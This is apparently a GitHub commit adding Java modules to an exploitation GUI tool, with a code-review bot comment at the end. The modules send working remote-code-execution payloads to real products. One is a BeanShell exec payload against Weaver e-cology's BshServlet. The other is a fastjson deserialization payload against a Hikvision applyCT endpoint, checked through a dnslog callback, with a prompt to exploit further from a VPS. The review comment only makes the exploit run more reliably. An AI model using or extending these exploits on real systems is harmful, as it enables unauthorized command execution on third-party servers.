White-hua
committed
Oct 3, 2022
1 parent
476fbe3
commit 81bce57
Showing
32 changed files
with
261 additions
and
48 deletions.
@@ -0,0 +1,43 @@ | ||
package Exp.OA.weaveroa; | ||
|
||
import Utilss.HttpTools; | ||
import Utilss.Response; | ||
import core.Exploitlnterface; | ||
import javafx.scene.control.TextArea; | ||
|
||
import java.util.HashMap; | ||
|
||
public class weaveroa_BshServlet implements Exploitlnterface { | ||
@Override | ||
public Boolean checkVul(String url, TextArea textArea) { | ||
Boolean att = att(url,textArea); | ||
return att; | ||
} | ||
|
||
@Override | ||
public Boolean getshell(String url, TextArea textArea) { | ||
textArea.appendText("\n 该漏洞已直接执行系统命令,无需getshell"); | ||
return false; | ||
} | ||
|
||
private Boolean att(String url,TextArea textArea){ | ||
Response response = HttpTools.get(url + "/weaver/bsh.servlet.BshServlet/", new HashMap<String, String>(), "utf-8"); | ||
if(response.getCode() == 200 && response.getText().contains("BeanShell Test Servlet")){ | ||
textArea.appendText("\n 漏洞存在 开始测试payload"); | ||
|
||
Response post = HttpTools.post(url + "/weaver/bsh.servlet.BshServlet/", "bsh.script=ex%5Cu0065c%28%22cmd+%2Fc+dir%22%29%3B" | ||
, new HashMap<String, String>(),"utf-8"); | ||
if(post.getCode() == 200 && post.getText().contains("BeanShell Test Servlet")){ | ||
textArea.appendText("\n ex\\u0065c(\"cmd /c dir\"); 可用"); | ||
return true; | ||
}else { | ||
textArea.appendText("\n payload未找到 请尝试手动绕过"); | ||
return true; | ||
} | ||
|
||
}else { | ||
textArea.appendText("\n e-cology BshServlet-RCE-漏洞不存在 (出现误报请联系作者)"); | ||
return false; | ||
} | ||
} | ||
} |
65 changes: 65 additions & 0 deletions
65
src/main/java/Exp/OA/weaveroa/weaveroa_WorkflowServiceXml.java
Large diffs are not rendered by default.
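--- a/src/main/java/Exp/equipment/HIKVISION/hik_applyCT_fastjson.java
+++ b/src/main/java/Exp/equipment/HIKVISION/hik_applyCT_fastjson.java
@@ -0,0 +1,48 @@
+package Exp.equipment.HIKVISION;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import Utilss.shell;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+
+public class hik_applyCT_fastjson implements Exploitlnterface {
+@Override
+public Boolean checkVul(String url, TextArea textArea) {
+textArea.appendText("\n该漏洞使用dnslog检测 发包后延时5秒查看结果 测试时间略长(10s左右)");
+Boolean att = att(url, textArea);
+return att;
+}
+
+@Override
+public Boolean getshell(String url, TextArea textArea) {
+return false;
+}
+
+private Boolean att(String url,TextArea textArea){
+HashMap<String, String> head = new HashMap<>();
+head.put("Content-Type", "application/json");
+Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
+int dns_1 = dns_le1.getText().length();
+
+String pay_1 = "{\"a\":{\"@type\":\"com.alibaba.fastjson.JSONObject\",{\"@type\":\"java.net.URL\",\"val\":\"" +
+shell.readFile(shell.dnspath) + "\"}}\"\"}";
+Response post = HttpTools.post(url + "/bic/ssoService/v1/applyCT", pay_1, head, "utf-8");
+
+try { Thread.sleep (5000) ;
+} catch (Exception ie){}
+
+Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
+int dns_2 = dns_le2.getText().length();
+
+if(dns_2 > dns_1){
+textArea.appendText("\n漏洞存在-收到dnslog回显,请使用VPS自行利用");
+return true;
+}else {
+textArea.appendText("\n综合安防_applyCT_fastjson-RCE-漏洞不存在 (出现误报请联系作者)");
+return false;
+}
+}
+}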
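Review bot: The empty `catch (Exception ie){}` around `Thread.sleep (5000)` in `att` swallows InterruptedException, so an interrupted scan silently proceeds to the second dnslog read and reports a verdict as if the full wait had elapsed. Catch the specific type, restore the interrupt flag and abort: `} catch (InterruptedException ie) { Thread.currentThread().interrupt(); return false; }`. The `post` response on the applyCT request is assigned but never read, so a transport failure is indistinguishable from a clean negative; at minimum append its status code to `textArea` before waiting. If `checkVul` is invoked on the JavaFX application thread the five-second sleep will block the UI, though the caller is not visible in this commit.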